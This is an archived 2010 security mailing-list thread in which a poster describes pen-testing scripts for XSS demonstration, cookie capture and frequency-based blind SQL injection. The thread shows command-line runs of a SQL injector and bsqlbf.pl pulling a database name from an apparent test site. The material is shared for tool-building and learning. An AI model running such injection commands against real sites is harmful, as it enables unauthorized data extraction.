PaulDotCom mailing list archives
Re: Misc Web Pen testing scripts
From: Dimitrios Kapsalis <dimitrios () gmail com>
Date: Tue, 7 Sep 2010 10:35:23 -0500
Thanks for sharing! On Tue, Sep 7, 2010 at 10:30 AM, Baggett, Mark <mark.baggett () morris com>wrote:
Not at all, but let me clean them up a bit first. I have a few small errors to fix then I'll post them to the pdc blog. -----Original Message----- From: pauldotcom-bounces () mail pauldotcom com [mailto: pauldotcom-bounces () mail pauldotcom com] On Behalf Of Robin Wood Sent: Sunday, September 05, 2010 11:49 AM To: PaulDotCom Security Weekly Mailing List Subject: Re: [Pauldotcom] Misc Web Pen testing scripts Would you mind if I added these to the PenTester Scripting website http://www.pentesterscripting.com/ ? Robin On 3 September 2010 17:31, Baggett, Mark <mark.baggett () morris com> wrote:I'm trying to learn python. Userpass.py was my first python script. (http://pauldotcom.com/2010/08/draft---creating-per-user-cust.html) Eventually, I am going to write something that doesn't completely suck. There scripts are still a work in progress. Send me comments and suggestion off list. I hope they are useful. If you find errors before I post these to the blog I'd appreciate a heads up. Thanks Mark Baggett 1)get2post.py Use to demonstrate POST based XSS attacks to a customer. Put get2post on a single host then you can create URL's with the POST values for the customer. Same functionality as http://www.whiteacid.org/misc/xss_post_forwarder.php but on your own server so you are not disclosing a customers XSS issues to a third party. 2)p0wnpr0xy.py Grabs URL's & cookies as you browse and launches the tool of choice. Here is a demo video http://www.vimeo.com/14667308 3)sqlinjector.py This is a MySQL blind SQL injector that uses a much different SQL injection technique. Instead of repeatedly cutting the alphabet in half or brute forcing the letters it uses a per letter frequency table to predict the next letter. For example, if you have a Q there is a HIGH probability that the next letter is a U. The technique is discussed and outlined here: http://www.exploit-db.com/papers/13696/ 47 fewer guesses than bsqlbf.pl! 79 vs 126 I implemented this technique in python. You give the script a vulnerable URL, and you put your SQL query in the URL with carets as markers at the point on injection. This syntax enables flexible url endings. mark.baggett$ $ python sqlinjector.py "http://testphp.vulnweb.com/listproducts.php?cat=1^database()^#" a ac acu acua acuar acuart end of word found Found target acuart in 79 guesses. mtcexcp007:misc mark.baggett$ mark.baggett$ perl bsqlbf.pl -blind cat -sql "database()" -url http://testphp.vulnweb.com/listproducts.php?cat=1 // Blind SQL injection brute force. // aramosf () 514 es / http://www.514.es <truncated> trying: acuart#### results: database() = acuart total hits: 126 _______________________________________________ Pauldotcom mailing list Pauldotcom () mail pauldotcom com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com_______________________________________________ Pauldotcom mailing list Pauldotcom () mail pauldotcom com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com _______________________________________________ Pauldotcom mailing list Pauldotcom () mail pauldotcom com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
_______________________________________________ Pauldotcom mailing list Pauldotcom () mail pauldotcom com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
Current thread:
- Misc Web Pen testing scripts Baggett, Mark (Sep 03)
- Re: Misc Web Pen testing scripts Robin Wood (Sep 07)
- Re: Misc Web Pen testing scripts Baggett, Mark (Sep 07)
- Re: Misc Web Pen testing scripts Dimitrios Kapsalis (Sep 07)
- Re: Misc Web Pen testing scripts Baggett, Mark (Sep 07)
- Re: Misc Web Pen testing scripts Robin Wood (Sep 07)